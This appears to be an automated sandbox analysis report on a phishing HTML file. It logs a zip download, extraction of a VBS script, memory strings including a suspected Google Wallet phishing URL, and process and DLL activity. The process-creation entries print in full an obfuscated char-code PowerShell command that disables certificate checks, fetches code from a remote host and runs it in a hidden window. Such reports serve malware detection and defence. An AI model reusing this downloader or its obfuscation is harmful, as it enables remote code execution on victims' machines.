Source: optimization-hints.pb.0.drString found in binary or memory: https://google-wallet-ccr-salvador.pagmob.com.br/pay
Source: sets.json.0.drString found in binary or memory: https://graziadaily.co.uk
Source: sets.json.0.drString found in binary or memory: https://grid.id
Source: sets.json.0.drString found in binary or memory: https://gridgames.app
Source: sets.json.0.drString found in binary or memory: https://growthrx.in
Source: sets.json.0.drString found in binary or memory: https://grupolpg.sv
Source: sets.json.0.drString found in binary or memory: https://gujaratijagran.com
Source: sets.json.0.drString found in binary or memory: https://hapara.com
Source: sets.json.0.drString found in binary or memory: https://hazipatika.com
Source: sets.json.0.drString found in binary or memory: https://hc1.com
Source: sets.json.0.drString found in binary or memory: https://hc1.global
Source: sets.json.0.drString found in binary or memory: https://hc1cas.com
Source: sets.json.0.drString found in binary or memory: https://hc1cas.global
Source: sets.json.0.drString found in binary or memory: https://healthshots.com
Source: sets.json.0.drString found in binary or memory: https://hearty.app
Source: sets.json.0.drString found in binary or memory: https://hearty.gift
Source: sets.json.0.drString found in binary or memory: https://hearty.me
Source: sets.json.0.drString found in binary or memory: https://heartymail.com
Source: sets.json.0.drString found in binary or memory: https://heatworld.com
Source: sets.json.0.drString found in binary or memory: https://helpdesk.com
Source: sets.json.0.drString found in binary or memory: https://hindustantimes.com
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600553863.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_openedL
Source: wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_openedW
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_openedY
Source: wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://histats.com/d_openede
Source: wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/XIh
Source: wscript.exe, 00000008.00000002.3599216434.0000000003126000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1839127825.000000000313A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/sta
Source: wscript.exe, 00000008.00000002.3599216434.00000000030F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stat
Source: wscript.exe, 00000008.00000002.3600197101.0000000005410000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006127000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3599216434.0000000003182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600008767.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.3600888684.0000000006153000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s4.histats.com/stats/0.php?4926118&
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 56893
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 56893 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 54.39.156.32:443 -> 192.168.2.4:49748 version: TLS 1.2

System Summary

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File dump: C:\Users\user\Downloads\CfF7MWq7aG.zip (copy)
Source: CfF7MWq7aG.zip.crdownload.0.dr | Zip Entry: 2025010453906.vbs
Source: chromecache_119.2.dr | Zip Entry: 2025010453906.vbs
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\Google.Widevine.CDM.dllJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_316616745\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\sets.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\LICENSEJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_221137523\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\LICENSE.txtJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\Filtering RulesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1443407132\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\cr_en-us_500000_index.bin
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_169250309\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\optimization-hints.pb
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_318976211\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\keys.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\LICENSE
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File deleted: C:\Windows\SystemTemp\chrome_BITS_4940_163090370
Source: Google.Widevine.CDM.dll.0.dr; Static PE information: Number of sections: 12 > 10
Source: classification engine; Classification label: mal92.phis.expl.evad.winHTML@50/41@15/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; File created: C:\Users\user\Downloads\430bc173-d568-4b25-b35a-96677460ca37.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exe; File created: C:\Users\user\AppData\Local\Temp\unarchiver.log
Source: C:\Windows\SysWOW64\unarchiver.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\cmd.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\unarchiver.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Source: C:\Windows\SysWOW64\unarchiver.exe; Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Source: C:\Windows\SysWOW64\7za.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\wscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\unarchiver.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\7za.exe; Section loaded: 7z.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe; Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\wscript.exe; Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
